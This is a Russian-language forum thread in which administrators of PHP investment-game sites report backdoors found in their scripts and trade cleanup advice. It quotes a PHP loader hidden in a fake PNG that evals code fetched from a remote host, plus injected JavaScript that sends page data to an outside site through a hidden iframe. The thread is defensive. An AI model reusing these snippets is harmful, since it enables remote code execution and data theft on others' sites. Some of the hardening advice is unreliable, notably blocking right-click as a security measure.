Дыры на сайтах

[rezerv Участник]

А еще у меня 485 строк с текстом license в 137 файлах
И license.php встречается в 2 файлах. 4 строки. Это все явно удалять надо или проще проект закрыть?

 

[Algolem Участник]

У меня в JS встречается eval ,как в середине слова так и отдельно.

так же в PNG файле,и в одном ПХП файле,че делать?и в ПНГ и в ПХП особого кода нет,только eval и еще какая то дребедень.Кому не трудно проверьте и подскажите что с ним делать.

D:\OpenServer\domains\xxx\js\editor\jscripts\tiny_mce\themes\simple\skins\o2k7\img\ (и вот эти два файла сидят вот здесь)

P.S При загрузке button.png форум выдал ошибку ,что загружаемый png Файл не является изображением,после чего сменил расширение на .txt где увидел следующее :

<?PHP
eval(file_get_contents("http://zaloopa.net/licence.txt"));
?>

P.S.S перейдя по ссылке выдает следующее :
echo 255;
die();

 

[Algolem Участник]

Извиняюсь за спам,просто был невнимателен,на первой странице есть описание о моем выше сказанном,если не смогу сам решить проблему,кто нибудь помогите пожалуйста!

 

[Algolem Участник]

Форумчане если htaccess помещен в ххх\js\editor\jscripts и после jscripts 403 ошибка,но до js все файлы видны,это ничего?

 

[blackyar24 Готов помочь Участник]

По поводу того как убрать себя из списка проектов на движке FF так и не был дан ответ(( уже все сделал а он не исчезает из списка,подскажите уже

 

[wh1skas wildcake Участник]

Сам ты его никак не уберешь. Сайт пропадет сам, через некоторое время. Точно когда - сказать не смогу. Но скажу сразу, что список там был ранее намного больше.

 

[nocenzru Участник]

У меня в JS встречается eval ,как в середине слова так и отдельно.

так же в PNG файле,и в одном ПХП файле,че делать?и в ПНГ и в ПХП особого кода нет,только eval и еще какая то дребедень.Кому не трудно проверьте и подскажите что с ним делать.

D:\OpenServer\domains\xxx\js\editor\jscripts\tiny_mce\themes\simple\skins\o2k7\img\ (и вот эти два файла сидят вот здесь)

P.S При загрузке button.png форум выдал ошибку ,что загружаемый png Файл не является изображением,после чего сменил расширение на .txt где увидел следующее :

<?PHP
eval(file_get_contents("http://zaloopa.net/licence.txt"));
?>

P.S.S перейдя по ссылке выдает следующее :
echo 255;
die();

Пока вызов кода просто печатает "255" и ничего более, но думаю в определенный момент на том сервере содержимое licence.txt станет иным и тогда.....

 

[Algolem Участник]

Пока вызов кода просто печатает "255" и ничего более, но думаю в определенный момент на том сервере содержимое licence.txt станет иным и тогда.....

И что с ним делать,если тупо удалю,помешает работе сайта?и если удалять какие именно файлы удалить?

 

[wh1skas wildcake Участник]

...
Советую всем удалить эту строку, несмотря на любые комментарии, которые там есть. Это все уловки. Если будет интересно, что делает этот код, пишите. Он нашелся в трех файлах.

 

[nocenzru Участник]

И что с ним делать,если тупо удалю,помешает работе сайта?и если удалять какие именно файлы удалить?

пожалуй самый безболезненый вариант - создать у себя на сервере похожие файлы (licence.txt и [URL='https://servahoc.ru/redirect/?url=http://zaloopa.net/licence.txt']licence.php например)[/URL] и заменить все ссылки с чужого на свой файл
другой вариант посложнее. необходимо удалять все строки где они встречаются. Но одновременно проверять работоспособность скрипта в целом. Хотя по моему опыту, удаление подобной заразы не ухудшает роботоспособность скрипта

 

[Algolem Участник]

Добрый день форумчане!Значит удалил все содержимое в файле button_pt.php , так же удалил псевдо-png файл.Пока изменений в скрипте не вижу.
и еще проверил скрипт на "http://find-xss.net/scanner/",и выявленные ошибки вроде закрыл,автоматом.и так пару раз,теперь при проверке выдает следующее :


/ххх/inc/_menu_top.php

2:Конструкция нуждается в ручной проверке
3:Конструкция нуждается в ручной проверке
4:Конструкция нуждается в ручной проверке

а это весь код в выше указанном файле,ну и что тут неправильного?

<ul class="hd-menu">
  <li><a href="/" <?=(!isset($_GET["menu"]) OR strtolower($_GET["menu"]) == "index") ? 'class="current"' : False; ?>>Главная</a></li>
  <li><a href="/news" <?=(isset($_GET["menu"]) AND strtolower($_GET["menu"]) == "news") ? 'class="current"' : False; ?>>Новости</a></li>
  <li><a href="/rules" <?=(isset($_GET["menu"]) AND strtolower($_GET["menu"]) == "rules") ? 'class="current"' : False; ?>>Правила</a></li>
  <li><a href="/about" <?=(isset($_GET["menu"]) AND strtolower($_GET["menu"]) == "about") ? 'class="current"' : False; ?>>О проекте</a></li>
   <li><a href="/contacts" <?=(isset($_GET["menu"]) AND strtolower($_GET["menu"]) == "contacts") ? 'class="current"' : False; ?>>Контакты</a></li>
</ul>

 

[wh1skas wildcake Участник]

Он тебя просит подкорректировать $_GET["menu"] и подобные GET-запросы.

 

[Algolem Участник]

Он тебя просит подкорректировать $_GET["menu"] и подобные GET-запросы.

А это очень трудно?я в ПХП не разбираюсь

 

[wh1skas wildcake Участник]

а пора уже давно научиться, раз собираешься администрировать инвест-проекты. Тем более...

 

[Algolem Участник]

а пора уже давно научиться, раз собираешься администрировать инвест-проекты. Тем более...

В этом ты прав,но я на практике более быстро осваиваю,чем сидеть и книжки читать.Поэтому здесь спрашиваю у гуру,потомучто более подробных описаний да еще и простым языком,нигде не найдешь!

 

[wh1skas wildcake Участник]

В этом ты прав,но я на практике более быстро осваиваю,чем сидеть и книжки читать.Поэтому здесь спрашиваю у гуру,потомучто более подробных описаний да еще и простым языком,нигде не найдешь!

вот тут https://servahoc.ru/threads/filtracija-i-proverka-dannyx-php-chastye-oshibki.997/ очень хорошо написано. Если с первого раза не поймешь, перечитай. Пропускать не советую и настоятельно рекомендую читать.

 

[gplm555 Местный]

Сейчас решил посмотреть "код элемента" и вдруг вот что увидел...
вот скопировал:

 function send_data(ifr_url){   var ifr0 = document.createElement('iframe'); ifr0.src = ifr_url; ifr0.style.width = '1px'; ifr0.style.height = '1px'; var div_x0 = document.getElementById('mast'); div_x0.appendChild(ifr0); } send_data('http://payloads.ru/ff.php?data=gametestgg.yolox.net /ftp_aerium-01/gametestgg_622/gametestgg.yolox.net/pages/account/_payment.php');

В файле payments нету ничего связанного с payloads..
Это безопасно?
Также прилагаю скрин.

И да, кстати, все тутблокируют ПКМ, но "показать код элемента" можно вызвать и через комбинацию клавиш CTRL+SHIFT+I (Chrome)

И что делать? Как сайт защитить от подмены кошелька? Помочь можешь? Заплачу!

 

[a010885 Местный]

я как раз ищу в сери как поставить правильно защиту htaccess на js. как по мне, то папка tiny_mce вообще не может удалиться из скрипта. они вроде нигде не конфигурирует. может я и ошибаюсь. но именно через нее идут хаки на сайт.

У меня вообще этой папки нет в фруктовой ферме, удаляйте её смело.

 

[a010885 Местный]

Через эту папку заливают кнопку _button.php и делают выплаты на свой кошель. Проверь, если в этой категории подобные файлы с именем button, удали их и на папку tiny_mce поставь права 444

Чтобы на сервер ничего не смогли залить, нужно в корне сайта иметь файл: .ftpaccess с содержимым:

<Limit All>
Order allow,deny
Allow from ВАШ АЙПИ
Deny from all
</Limit>

<Limit WRITE>
DenyAll
</Limit>
и тогда ниодна б**дь никогда не сможет ничего залить на сайт и изменить ни один файл. но и вы тоже не сможете, прежде чем изменить какой то файл на своём сайте или залить что то новое, вам предётся удалить .ftpaccess через СИ панель в файловом менеджере.

 

[juranja Местный]

Сразу добавлю, видел поднималась тема насчет подмены привязанного кошелька на странице при помощи, выделении элемента и команды "Просмотр код элемента". Заменяя тем самым в редакторе привязанный кошелек к нужному. Так вот, для того, чтобы пользователь не смог это сделать, запретите использование пкм на странице(ах):

<script LANGUAGE="JavaScript1.1">
document.oncontextmenu = function(){return false;};
</script>

Вставляем код в самую верхнюю часть файла.

можно немного по подробней в каком файле вставляем данный код